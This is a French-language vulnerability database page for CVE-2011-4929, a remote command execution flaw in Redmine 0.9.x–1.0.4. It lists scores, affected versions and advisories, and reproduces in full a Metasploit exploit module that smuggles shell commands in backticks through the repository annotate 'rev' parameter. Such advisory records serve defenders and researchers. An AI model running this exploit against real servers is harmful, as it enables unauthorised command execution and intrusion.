CVE-2011-4929 : Détail

CVE-2011-4929

95.38%V3
Network
2012-10-08
18h00 +00:00
2024-09-16
21h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Unspecified vulnerability in the bazaar repository adapter in Redmine 0.9.x and 1.0.x before 1.0.5 allows remote attackers to execute arbitrary commands via unknown vectors.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE Other No informations.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 41695

Date de publication : 2010-12-18 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Redmine SCM Repository Arbitrary Command Execution', 'Description' => %q{ This module exploits an arbitrary command execution vulnerability in the Redmine repository controller. The flaw is triggered when a rev parameter is passed to the command line of the SCM tool without adequate filtering. }, 'Author' => [ 'joernchen <joernchen[at]phenoelit.de>' ], #Phenoelit 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2011-4929'], ['OSVDB', '70090'], ['URL', 'http://www.redmine.org/news/49' ] ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Space' => 512, 'Compat' => { 'PayloadType' => 'cmd', #'RequiredCmd' => 'generic telnet', } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Dec 19 2010', 'DefaultTarget' => 0)) register_options( [ OptString.new('URI', [true, "The full URI path to the project", "/projects/1/"]), ], self.class) end def exploit command = Rex::Text.uri_encode(payload.encoded) urlconfigdir = normalize_uri(datastore['URI'], "/repository/annotate") + "?rev=`#{command}`" res = send_request_raw({ 'uri' => urlconfigdir, 'method' => 'GET', 'headers' => { 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Connection' => 'Close', } }, 25) if (res) print_status("The server returned: #{res.code} #{res.message}") else print_status("No response from the server") end handler end end

Products Mentioned

Configuraton 0

Redmine>>Redmine >> Version 0.9.0

Redmine>>Redmine >> Version 0.9.1

Redmine>>Redmine >> Version 0.9.2

Redmine>>Redmine >> Version 0.9.3

Redmine>>Redmine >> Version 0.9.4

Redmine>>Redmine >> Version 0.9.5

Redmine>>Redmine >> Version 0.9.6

Redmine>>Redmine >> Version 1.0.0

Redmine>>Redmine >> Version 1.0.1

Redmine>>Redmine >> Version 1.0.2

Redmine>>Redmine >> Version 1.0.3

Redmine>>Redmine >> Version 1.0.4

Références

http://www.openwall.com/lists/oss-security/2012/01/06/5
Tags : mailing-list, x_refsource_MLIST
http://www.debian.org/security/2011/dsa-2261
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.openwall.com/lists/oss-security/2012/01/06/7
Tags : mailing-list, x_refsource_MLIST
http://www.redmine.org/news/49
Tags : x_refsource_CONFIRM